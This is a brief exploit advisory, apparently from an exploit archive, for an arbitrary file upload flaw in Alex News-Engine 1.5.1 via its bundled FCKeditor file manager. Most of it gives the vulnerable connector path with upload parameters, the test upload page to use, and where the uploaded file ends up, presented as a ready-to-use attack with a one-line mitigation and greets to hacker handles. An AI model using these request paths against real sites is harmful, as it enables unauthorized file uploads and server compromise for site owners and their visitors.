Alex News-Engine version 1.5.1 suffers from a remote arbitrary file upload vulnerability.
f56a33c17e06e03e38fdf7a05a1ac3fa9778d53ef69f3c1a093d9c4e83ae83ca
########################################################################
#
# Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discover by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- how To use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict and grant only trusted users access to the resources.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################